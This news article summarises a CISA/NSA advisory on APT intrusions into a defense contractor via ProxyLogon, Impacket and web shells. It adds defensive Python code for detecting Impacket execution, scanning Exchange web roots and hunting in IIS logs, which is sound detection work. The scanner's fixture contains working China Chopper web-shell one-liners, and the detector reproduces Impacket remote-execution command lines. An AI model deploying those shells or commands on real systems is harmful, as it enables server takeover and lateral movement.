The Cybersecurity and Infrastructure Security Agency (CISA) and the National Security Agency (NSA) issued a joint cybersecurity advisory on multiple advanced persistent threat (APT) groups that compromised a Defense Industrial Base (DIB) sector organization and exfiltrated sensitive data.
CISA and a third-party incident response firm, Mandiant, responded to a network security incident between November 2021 and January 2022. Both response teams found a threat actor on the victim's network, and CISA further determined that multiple threat actors had access to the environment, some of them with possible long-term persistence.
“During incident response activities, CISA uncovered that likely multiple APT groups compromised the organization’s network, and some APT actors had long-term access to the environment,” the cybersecurity advisory warned.
Subsequently, CISA and NSA published a joint advisory with indicators of compromise and possible mitigations.
APT groups used open-source tools to compromise a defense organization
CISA stated that the threat actors leveraged an open-source toolkit called Impacket, a Python collection of classes for working with network protocols that ships with example scripts attackers routinely use for remote execution, persistence, and lateral movement. The advisory identifies two of those scripts, wmiexec.py and smbexec.py, which use Windows Management Instrumentation (WMI) and Server Message Block (SMB) respectively to create a semi-interactive shell that runs commands on a remote host and reads the output back over the ADMIN$ or C$ share.
The hackers also used Impacket to access privileged service accounts, which they used to access the organization’s Microsoft Exchange server via the Outlook Web Access (OWA) client. Four hours after compromising the environment, the attackers performed mailbox searches and accessed the Exchange Web Services API.
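Both Impacket scripts named above leave recognizable command-line artifacts on the target, which is what the advisory's detection guidance keys on. The following detection logic is an added example written for this article, not code from CISA, NSA or the Impacket project; it runs over constructed process-creation records (parent image, image, command line, as one would extract from Sysmon Event ID 1 or Security Event ID 4688) and labels wmiexec.py and smbexec.py execution, plus the lower-confidence case of WmiPrvSE.exe spawning a shell without the tell-tale redirection.

```python
import re
from dataclasses import dataclass
from typing import List, Optional, Tuple


@dataclass
class ProcessEvent:
    """Minimal process-creation record (constructed shape, not a real log schema)."""
    parent_image: str   # e.g. C:\Windows\System32\wbem\WmiPrvSE.exe
    image: str          # e.g. C:\Windows\System32\cmd.exe
    command_line: str


# wmiexec.py runs each command via WMI Win32_Process.Create as
#   cmd.exe /Q /c <command> 1> \\127.0.0.1\ADMIN$\__<unix-time> 2>&1
# (child of WmiPrvSE.exe) and then fetches the output file over SMB.
WMIEXEC_RE = re.compile(
    r"/Q\s+/c\s+.+?\s+1>\s*\\\\127\.0\.0\.1\\ADMIN\$\\__\d+(?:\.\d+)?\s+2>&1",
    re.IGNORECASE,
)

# smbexec.py creates a service whose binary path writes and runs a batch file:
#   %COMSPEC% /Q /c echo <command> ^> \\127.0.0.1\C$\__output 2^>^&1 > %TEMP%\execute.bat & ...
SMBEXEC_RE = re.compile(
    r"%COMSPEC%\s+/Q\s+/c\s+echo\s+.+?\\\\127\.0\.0\.1\\C\$\\__output.+?execute\.bat",
    re.IGNORECASE,
)

SHELLS = ("cmd.exe", "powershell.exe")


def _basename(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def classify(evt: ProcessEvent) -> Optional[str]:
    """Return a detection label for one event, or None if nothing matched."""
    if WMIEXEC_RE.search(evt.command_line):
        return "impacket-wmiexec"
    if SMBEXEC_RE.search(evt.command_line):
        return "impacket-smbexec"
    # Lower confidence: the WMI provider host spawning an interactive shell is
    # unusual outside remote administration and deserves analyst review.
    if _basename(evt.parent_image) == "wmiprvse.exe" and _basename(evt.image) in SHELLS:
        return "wmi-spawned-shell"
    return None


def scan(events: List[ProcessEvent]) -> List[Tuple[int, str]]:
    """Return (index, label) for every event that triggers a detection."""
    hits = []
    for i, evt in enumerate(events):
        label = classify(evt)
        if label:
            hits.append((i, label))
    return hits


# Constructed sample events: two Impacket patterns, one WMI-spawned shell, one benign.
SAMPLE_EVENTS = [
    ProcessEvent(
        r"C:\Windows\System32\wbem\WmiPrvSE.exe",
        r"C:\Windows\System32\cmd.exe",
        r"cmd.exe /Q /c whoami 1> \\127.0.0.1\ADMIN$\__1663000000.1234 2>&1",
    ),
    ProcessEvent(
        r"C:\Windows\System32\services.exe",
        r"C:\Windows\System32\cmd.exe",
        r"%COMSPEC% /Q /c echo net user ^> \\127.0.0.1\C$\__output 2^>^&1 > %TEMP%\execute.bat "
        r"& %COMSPEC% /Q /c %TEMP%\execute.bat & del %TEMP%\execute.bat",
    ),
    ProcessEvent(
        r"C:\Windows\System32\wbem\WmiPrvSE.exe",
        r"C:\Windows\System32\cmd.exe",
        r"cmd.exe /c ipconfig /all",
    ),
    ProcessEvent(
        r"C:\Windows\explorer.exe",
        r"C:\Windows\System32\cmd.exe",
        r"cmd.exe /c dir C:\Users",
    ),
]

if __name__ == "__main__":
    for idx, label in scan(SAMPLE_EVENTS):
        print(f"event {idx}: {label} :: {SAMPLE_EVENTS[idx].command_line}")
```

The two high-confidence patterns are stable because they come from the scripts' hard-coded command templates; the loopback UNC path is what makes them distinctive, since legitimate administrators almost never redirect output to `\\127.0.0.1\ADMIN$`. Treat the third label as a hunting lead rather than an alert, and expect the timestamp file name and the `__output` name to differ in modified Impacket forks.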
Additionally, the attackers used a custom data exfiltration tool, CovalentStealer, to exfiltrate sensitive data. CovalentStealer can enumerate network shares, select files by path, and upload the stolen documents to a remote server.
According to the cybersecurity advisory, the hackers stole contract-related information, company emails, meetings, and contacts.
Microsoft Exchange Server vulnerabilities at play
In early March 2021, the APT actors exploited vulnerabilities CVE-2021-26855, CVE-2021-26857, CVE-2021-26858, and CVE-2021-27065 to install 17 China Chopper web shells.
The breach’s timeline coincides with the peak exploitation of the Microsoft Exchange Server ProxyLogon chain, in which CVE-2021-26855 (a server-side request forgery that lets an unauthenticated attacker impersonate the Exchange server) is chained with CVE-2021-27065 (a post-authentication arbitrary file write) to drop web shells on the server.
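The 17 China Chopper web shells mentioned above are tiny ASPX files whose whole payload is an `eval` of a request parameter, which makes them easy to sweep for on an Exchange front end. The scanner below is an added example written for this article (not a tool from the advisory or from Microsoft); it builds a constructed directory layout imitating Exchange front-end paths, with two shells and two benign files, and reports every server-executable script whose body evaluates attacker-supplied input, with a SHA-256 for IOC matching.

```python
import hashlib
import os
import re
import tempfile
from typing import Dict, List, Optional

# Extensions IIS/ASP.NET will execute under the Exchange web roots.
SCRIPT_EXTS = {".aspx", ".asp", ".ashx", ".asmx"}

# Classic China Chopper ASPX body:
#   <%@ Page Language="Jscript"%><%eval(Request.Item["password"],"unsafe");%>
# The parameter name varies per deployment, so match the eval-of-request core.
CHOPPER_RE = re.compile(
    r"""eval\s*\(\s*Request(?:\.Item)?\s*\[\s*["'][^"']+["']\s*\]\s*,\s*["']unsafe["']\s*\)""",
    re.IGNORECASE,
)
# Broader, lower-confidence signature: any server-side eval fed from the request object.
EVAL_REQUEST_RE = re.compile(r"eval\s*\(\s*Request\b", re.IGNORECASE)


def classify_source(text: str) -> Optional[str]:
    """Label a script body as a China Chopper shell, a generic eval-of-request, or clean."""
    if CHOPPER_RE.search(text):
        return "china-chopper"
    if EVAL_REQUEST_RE.search(text):
        return "eval-of-request"
    return None


def scan_webroot(root: str) -> List[Dict[str, object]]:
    """Walk a web root and return one record per suspicious server-side script."""
    hits: List[Dict[str, object]] = []
    for dirpath, _, filenames in os.walk(root):
        for name in filenames:
            if os.path.splitext(name)[1].lower() not in SCRIPT_EXTS:
                continue  # .css/.js/.htm cannot execute server-side; skip them
            path = os.path.join(dirpath, name)
            with open(path, "rb") as fh:
                data = fh.read()
            label = classify_source(data.decode("utf-8", errors="replace"))
            if label:
                hits.append({
                    "path": os.path.relpath(path, root),
                    "label": label,
                    "size": len(data),
                    "sha256": hashlib.sha256(data).hexdigest(),
                })
    return sorted(hits, key=lambda h: str(h["path"]))


def build_sample_webroot() -> str:
    """Create a constructed Exchange-like web root in a temp dir (sample data, not real)."""
    root = tempfile.mkdtemp(prefix="exchange-webroot-")
    files = {
        # Two shells in directories ProxyLogon web shells were commonly dropped into.
        os.path.join("aspnet_client", "system_web", "help.aspx"):
            '<%@ Page Language="Jscript"%><%eval(Request.Item["orange"],"unsafe");%>',
        os.path.join("FrontEnd", "HttpProxy", "owa", "auth", "errorFF.aspx"):
            '<script language="JScript" runat="server">'
            'function Page_Load(){eval(Request["pw"],"unsafe");}</script>',
        # Benign page and a non-script file containing the pattern (must be ignored).
        os.path.join("FrontEnd", "HttpProxy", "owa", "auth", "logon.aspx"):
            '<%@ Page Language="C#" %><html><body>Sign in</body></html>',
        os.path.join("FrontEnd", "HttpProxy", "owa", "auth", "logon.css"):
            'eval(Request["x"],"unsafe")',
    }
    for rel, content in files.items():
        full = os.path.join(root, rel)
        os.makedirs(os.path.dirname(full), exist_ok=True)
        with open(full, "w", encoding="utf-8") as fh:
            fh.write(content)
    return root


if __name__ == "__main__":
    for hit in scan_webroot(build_sample_webroot()):
        print(f"{hit['label']:16} {hit['size']:5d}B {hit['sha256'][:16]}... {hit['path']}")
```

Point `scan_webroot` at the real `%ExchangeInstallPath%\FrontEnd\HttpProxy` and `C:\inetpub\wwwroot\aspnet_client` trees on a suspect server. Signature matching only finds shells that look like the classic one-liner; pair it with a diff of the script inventory against a clean Exchange install of the same cumulative update, since post-ProxyLogon shells were also written into files with innocuous names.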
Later in March 2021, the attackers installed the HyperBro remote access trojan (RAT) as a backdoor. The HyperBro backdoor can download and upload files on a compromised system, log keystrokes, and execute commands.
Multiple nation-state APT groups accessed a defense company’s environment
The security agencies did not implicate any particular hacking group but suggested that multiple APT groups had access.
Microsoft attributed the initial wave of ProxyLogon (CVE-2021-26855) exploitation to Hafnium, a China-based state-sponsored group tracked under Microsoft's own designation (it is not the same cluster as Mandiant's APT40); the same vulnerability was exploited in the attack on the defense organization. Emissary Panda (also tracked as APT27, LuckyMouse, Bronze Union, and Budworm) deployed the HyperBro RAT against German commercial organizations in early 2022. Given that overlap in exploits and tooling, Hafnium and APT27 are the most plausible candidates, although the advisory attributes the intrusion to neither. Less likely candidates include Iran's PHOSPHORUS (or its DEV-0270 subgroup) and North Korea's Lazarus Group, both of which have used Impacket.
“The national security implications of this espionage campaign are significant,” said Tom Kellermann, senior vice president of cyber strategy at Contrast Security. “The Chinese threat actor behind this intrusion represents their ‘A team.’ With tensions simmering over Taiwan, we presume more of these infiltrations are occurring.”
Kellermann suggested that the APT groups could island-hop from the defense company into the military.
“Expanded threat hunting across Microsoft Exchange servers and their administrators’ endpoints is imperative,” he added. “My biggest concern is whether the integrity of the data was manipulated post-exploitation.”
Hackers compromised defense company using an ex-employee’s account
The joint advisory also disclosed that, beginning in mid-January 2022, the attackers used valid credentials to access the compromised systems.
One account used to access Exchange Web Services (EWS) belonged to a former employee. CISA did not disclose how the attackers obtained the credentials.
The threat actors used virtual private network (VPN) and virtual private server (VPS) infrastructure from M247 and SurfShark to reach the Exchange Server. CISA noted that threat actors frequently use such providers because they obscure the link between the attackers and the victims’ networks.
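The two facts in the passage above, a former employee's account hitting EWS and connections arriving from commercial VPN/VPS space, are each cheap to hunt for in the Exchange front-end IIS logs. The code below is an added example written for this article, not tooling from the advisory. It parses the W3C-format IIS log (using the `#Fields:` header rather than fixed column positions), then flags mail-protocol requests whose account is on a constructed list of departed users or whose source IP falls in a constructed watch list; the `198.51.100.0/24` and `203.0.113.0/24` ranges are documentation placeholders, not M247's or SurfShark's real address space, and the log lines are constructed sample data.

```python
import ipaddress
from typing import Dict, List

# Constructed watch lists: a terminated-accounts list an identity team would export,
# and placeholder networks standing in for the VPN/VPS providers' published ranges.
FORMER_EMPLOYEES = {"corp\\jdoe", "corp\\former.contractor"}
VPN_PROVIDER_RANGES = [ipaddress.ip_network(n) for n in ("198.51.100.0/24", "203.0.113.0/24")]

# Exchange client endpoints worth watching; EWS is the one named in the advisory.
MAIL_PATHS = ("/ews/", "/owa/", "/mapi/", "/microsoft-server-activesync/")

# Constructed IIS W3C log excerpt (sample data, not from the incident).
SAMPLE_IIS_LOG = """#Software: Microsoft Internet Information Services 10.0
#Fields: date time cs-method cs-uri-stem cs-username c-ip cs(User-Agent) sc-status
2022-01-18 03:12:44 POST /ews/exchange.asmx corp\\jdoe 198.51.100.23 python-requests/2.26 200
2022-01-18 03:13:01 GET /owa/auth/logon.aspx - 192.0.2.10 Mozilla/5.0 200
2022-01-18 08:40:12 POST /ews/exchange.asmx corp\\asmith 10.20.30.40 Microsoft+Office/16.0 200
2022-01-18 09:02:55 POST /mapi/emsmdb/ corp\\asmith 203.0.113.77 Microsoft+Office/16.0 200
2022-01-18 09:05:00 GET /healthcheck.htm - 10.0.0.5 HealthProbe 200
"""


def parse_iis_log(text: str) -> List[Dict[str, str]]:
    """Parse W3C IIS log text into dicts keyed by the names in the #Fields: directive."""
    fields: List[str] = []
    rows: List[Dict[str, str]] = []
    for line in text.splitlines():
        if not line.strip():
            continue
        if line.startswith("#Fields:"):
            fields = line.split()[1:]   # field list can change mid-file; always honour the latest
            continue
        if line.startswith("#"):
            continue                    # other directives (#Software, #Date, ...)
        values = line.split()
        if len(values) != len(fields):
            continue                    # truncated or malformed entry; skip rather than misalign
        rows.append(dict(zip(fields, values)))
    return rows


def hunt(rows: List[Dict[str, str]]) -> List[Dict[str, object]]:
    """Flag mail-protocol requests by departed accounts or from watch-listed networks."""
    former = {u.lower() for u in FORMER_EMPLOYEES}
    findings: List[Dict[str, object]] = []
    for row in rows:
        uri = row.get("cs-uri-stem", "").lower()
        if not uri.startswith(MAIL_PATHS):
            continue
        user = row.get("cs-username", "-").lower()
        reasons = []
        if user in former:
            reasons.append("former-employee-account")
        try:
            ip = ipaddress.ip_address(row.get("c-ip", ""))
        except ValueError:
            ip = None                   # X-Forwarded-For junk or '-' ; don't crash the hunt
        if ip is not None and any(ip in net for net in VPN_PROVIDER_RANGES):
            reasons.append("vpn-vps-source")
        if reasons:
            findings.append({
                "time": f"{row.get('date', '?')} {row.get('time', '?')}",
                "user": user,
                "ip": str(ip) if ip is not None else row.get("c-ip", ""),
                "uri": uri,
                "reasons": reasons,
            })
    return findings


if __name__ == "__main__":
    for f in hunt(parse_iis_log(SAMPLE_IIS_LOG)):
        print(f"{f['time']} {f['user']:24} {f['ip']:16} {f['uri']:24} {', '.join(f['reasons'])}")
```

Two caveats from the passage apply directly: a former employee's account should not authenticate at all, so the right fix is to disable it and sweep for others like it, not merely to alert; and pre-authentication OWA hits show `-` as the user, so source-network matching is the only signal available for those until the logon succeeds. The user-agent column is also worth a look, since a scripted `python-requests` client on EWS is not how Outlook talks to the server.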
Terry Olaes, Director of Sales Engineering at Skybox Security, said the alert was a reminder to include infrastructure devices in vulnerability management programs.
“Security teams need to quickly assess vulnerability risk posed across both endpoint and infrastructure assets without waiting for other teams, such as platform and network functions, to provide feedback,” he concluded.